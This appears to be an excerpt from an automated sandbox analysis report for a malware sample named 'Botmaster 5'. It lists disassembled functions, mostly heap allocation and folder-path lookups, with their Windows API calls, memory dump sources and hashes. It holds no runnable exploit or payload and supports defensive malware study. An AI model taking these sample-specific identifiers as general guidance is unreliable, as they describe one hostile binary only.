                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98112EF1604211AFD715EB51FC42A2A77ADEB44314F44842FF284D6261D7B89C80CBAA
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040688E Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 004299B0: RtlAllocateHeap.NTDLL(00990000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299D6
                                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000014,00000000,00000000,00000104,00000000,00000000,00000000,00000000,004097AE,00000000,00000001,00000000,00000000,00000000,?), ref: 004068CC
                                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 004068D9
                                                                                                                                                                                                                    • Part of subcall function 00429950: wcslen.MSVCRT ref: 00429963
                                                                                                                                                                                                                    • Part of subcall function 004299B0: HeapReAlloc.KERNEL32(00990000,00000000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299F9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$AllocAllocateFolderFromListLocationPathSpecialwcslen
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1484742105-0
                                                                                                                                                                                                                  • Opcode ID: 2cc0a3716ec88ae72fceea1393f1ae889f140b90b78bad05adf2ce1c66c9750e
                                                                                                                                                                                                                  • Instruction ID: 333536221f4685485911f6dbd60b646dcb6e7564056d3c903693a371a8964fc8
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cc0a3716ec88ae72fceea1393f1ae889f140b90b78bad05adf2ce1c66c9750e
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F112BF1604211AFD715EB51FC42A2A77ACEB44314F44842FF284DA261E7B89C81CBAE
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00406A48 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 004299B0: RtlAllocateHeap.NTDLL(00990000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299D6
                                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000002,00000000,00000000,00000104,00000000,00000000,00000000,00000000,00409724,00000000,00000001,00000000,00000000,00000000,?), ref: 00406A86
                                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 00406A93
                                                                                                                                                                                                                    • Part of subcall function 00429950: wcslen.MSVCRT ref: 00429963
                                                                                                                                                                                                                    • Part of subcall function 004299B0: HeapReAlloc.KERNEL32(00990000,00000000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299F9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$AllocAllocateFolderFromListLocationPathSpecialwcslen
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1484742105-0
                                                                                                                                                                                                                  • Opcode ID: b40a564332300a2d5bc3d97d487b93cea9300b33b2f76f3e95258608cd2d4612
                                                                                                                                                                                                                  • Instruction ID: d1aba9edbdf58202fe00d84abec600271f86aa59a86cccccd060064d815687ef
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b40a564332300a2d5bc3d97d487b93cea9300b33b2f76f3e95258608cd2d4612
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93111CF1604211AFD715EB51EC42E2A77ACEB44314F44842EF644DA262E7B89C80DFAA
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00406B2B Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 004299B0: RtlAllocateHeap.NTDLL(00990000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299D6
                                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000017,00000000,00000000,00000104,00000000,00000000,00000000,00000000,00409769,00000000,00000001,00000000,00000000,00000000,?), ref: 00406B69
                                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 00406B76
                                                                                                                                                                                                                    • Part of subcall function 00429950: wcslen.MSVCRT ref: 00429963
                                                                                                                                                                                                                    • Part of subcall function 004299B0: HeapReAlloc.KERNEL32(00990000,00000000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299F9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$AllocAllocateFolderFromListLocationPathSpecialwcslen
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1484742105-0
                                                                                                                                                                                                                  • Opcode ID: bc1db2b47629e466ff3c284932856ea890d0aaa96a7ed5d11d5733048e6f6fd7
                                                                                                                                                                                                                  • Instruction ID: c172052b48f065783de00584a35e5bf44f518247813ac871aae00fb687b90d73
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc1db2b47629e466ff3c284932856ea890d0aaa96a7ed5d11d5733048e6f6fd7
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E1121F1604211AFD715EB51FC42A2A77ACEB44314F54842FF284CA261E7B89C80DBAA
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00406C0E Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 004299B0: RtlAllocateHeap.NTDLL(00990000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299D6
                                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,00000000,00000000,00000104,00000000,00000000,00000000,00000000,00409610,00000000,00000001,00000000,00000000,00000000,?), ref: 00406C4C
                                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 00406C59
                                                                                                                                                                                                                    • Part of subcall function 00429950: wcslen.MSVCRT ref: 00429963
                                                                                                                                                                                                                    • Part of subcall function 004299B0: HeapReAlloc.KERNEL32(00990000,00000000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299F9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$AllocAllocateFolderFromListLocationPathSpecialwcslen
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1484742105-0
                                                                                                                                                                                                                  • Opcode ID: b4a34c905d5839950ed43e5ad51efe15c9bd2a0298994052dc6e4608ad16a0db
                                                                                                                                                                                                                  • Instruction ID: 47c18dc2ff13017dda123d593325e9589050ea94d9104a24cf76f019533fad54
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4a34c905d5839950ed43e5ad51efe15c9bd2a0298994052dc6e4608ad16a0db
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15112EF1604211AFE715EB51FC42A2A77ACFB44314F44842FF284C6261D7B89C80CBAE
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00406CF1 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 004299B0: RtlAllocateHeap.NTDLL(00990000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299D6
                                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000018,00000000,00000000,00000104,00000000,00000000,00000000,00000000,00409655,00000000,00000001,00000000,00000000,00000000,?), ref: 00406D2F
                                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 00406D3C
                                                                                                                                                                                                                    • Part of subcall function 00429950: wcslen.MSVCRT ref: 00429963
                                                                                                                                                                                                                    • Part of subcall function 004299B0: HeapReAlloc.KERNEL32(00990000,00000000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299F9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$AllocAllocateFolderFromListLocationPathSpecialwcslen
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1484742105-0
                                                                                                                                                                                                                  • Opcode ID: 4a315a7023f1f3ab39401f7f01bcef4fd509ae473ec183aec0d84c0c83aa1a48
                                                                                                                                                                                                                  • Instruction ID: e6999f556eb80c89a8fc29049245312d5a9ee59c6aacd9421a948248ea0c1a49
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a315a7023f1f3ab39401f7f01bcef4fd509ae473ec183aec0d84c0c83aa1a48
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E112EF1604211AFD715EB51EC42A2A77ADEF54314F44842FF244C6261D7B89C84CBAA
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00427A6C Relevance: 3.1, APIs: 2, Instructions: 52memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000034,?,?,?,0041CA17,00000074,00000000,00000000,00000007,00401080,00000000,00001000,00000000,00000000), ref: 00427A7F
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00401080,00000008,?,?,?,0041CA17,00000074,00000000,00000000,00000007,00401080,00000000,00001000,00000000,00000000), ref: 00427A94
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$AllocAllocate
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2177240990-0
                                                                                                                                                                                                                  • Opcode ID: 83e9df985fceff659173c6c81a1f9e9f0c7baf2ace3725a45c789c6094348af7
                                                                                                                                                                                                                  • Instruction ID: 4a78dfe98a3a4cfade302f6977abac0f1efaa5ddf1f96b5d890e43c2b63c38e5
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83e9df985fceff659173c6c81a1f9e9f0c7baf2ace3725a45c789c6094348af7
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 471128B1244B409FC360CF2AD981B07FBF4BB98714F50492EE18A97A91D7B4B414CB5A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004299B0 Relevance: 3.0, APIs: 2, Instructions: 46memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00990000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299D6
                                                                                                                                                                                                                  • HeapReAlloc.KERNEL32(00990000,00000000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299F9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$AllocAllocate
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2177240990-0
                                                                                                                                                                                                                  • Opcode ID: 35d8b24dc5a44f58801913d2834ca9b18c3b9b2a4c4d39a09df6fb656593825a
                                                                                                                                                                                                                  • Instruction ID: 36c1da3cd3aee3458b78e3f0ca0cd9c4f1bd9e8ebc4d9d4d9ac431e88177dabd
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35d8b24dc5a44f58801913d2834ca9b18c3b9b2a4c4d39a09df6fb656593825a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1311DBB4600208EFC700CF68E881E5A77BAFB89355F10C159F9598B354E775AD41CB99
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041B430 Relevance: 3.0, APIs: 2, Instructions: 32memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,009A1000,?,?,?,004013C1,00000000,00000001,00000000), ref: 0041B46F
                                                                                                                                                                                                                    • Part of subcall function 0041B3F0: WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0041B671,00000000,009A1000,00000000,?,?,?,00401271,00000000), ref: 0041B415
                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(009A0000,00000000,?,00000000,009A1000,?,?,?,004013C1,00000000,00000001,00000000), ref: 0041B466
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ChangeCloseFileFindFreeHeapNotificationWrite
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3807821158-0
                                                                                                                                                                                                                  • Opcode ID: 897af249c0bbbc47a9008fb4b3e364f102ca16508c7efd81c5e13b083661b3c3
                                                                                                                                                                                                                  • Instruction ID: 6abd8a0181aab8a43d46853b8c31cfd3615734ccfe63a3ea3176dc8880bfdacc
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 897af249c0bbbc47a9008fb4b3e364f102ca16508c7efd81c5e13b083661b3c3
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23F0E9716011106BC720A799EC48E5B77ACDBC4710B00851EF841532A1D7B89C41CBAE
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00424279 Relevance: 3.0, APIs: 2, Instructions: 19windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 00427F4B: HeapAlloc.KERNEL32(00000008,00000020,?,?,0042774D,00000004,00000010,00427698,00401058,00000000,00001000,00000000,00000000), ref: 00427F5D
                                                                                                                                                                                                                    • Part of subcall function 00427F4B: HeapAlloc.KERNEL32(00000008,00000000,?,?,0042774D,00000004,00000010,00427698,00401058,00000000,00001000,00000000), ref: 00427F88
                                                                                                                                                                                                                    • Part of subcall function 00428040: HeapAlloc.KERNEL32(00000008,00000000,?,00427760,0000000C,00000000,004276F3,00000004,00000010,00427698,00401058,00000000,00001000,00000000,00000000), ref: 0042804D
                                                                                                                                                                                                                  • LoadIconW.USER32(00000001,00000048), ref: 004242A7
                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004242B9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocHeap$Load$CursorIcon
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3203760603-0
                                                                                                                                                                                                                  • Opcode ID: 3e7671e6059e9513914cc96bcbb6d3731f77f53445d0a35a0571d3a3f7819634
                                                                                                                                                                                                                  • Instruction ID: f6eff97f1c709329d8ff0ab2af4692c6578e1259bf17592764787a12c05246a3
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e7671e6059e9513914cc96bcbb6d3731f77f53445d0a35a0571d3a3f7819634
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2E0BFB4FC5310AADB119BB17C6BB143A65A708F05F5044BBF640BA1E1FAF960509B0E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004298D0 Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,0040104E,00000000,00001000,00000000,00000000), ref: 004298DC
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00990000,00000000,00004208,?,0040104E,00000000,00001000,00000000,00000000), ref: 0042990A
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$AllocCreate
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2618940340-0
                                                                                                                                                                                                                  • Opcode ID: 221460677593f9061977f49b16748dea5dbd43a04af66006ab83660779b3d354
                                                                                                                                                                                                                  • Instruction ID: 586b6477f139f66befdc879a9c78d77415b9c120320476c2819c46468397cb0b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 221460677593f9061977f49b16748dea5dbd43a04af66006ab83660779b3d354
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3E0B6B0181344ABE300DFA1FC95B213BA8F308701F008029FA458A3E0E7F254848FAE
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00429920 Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
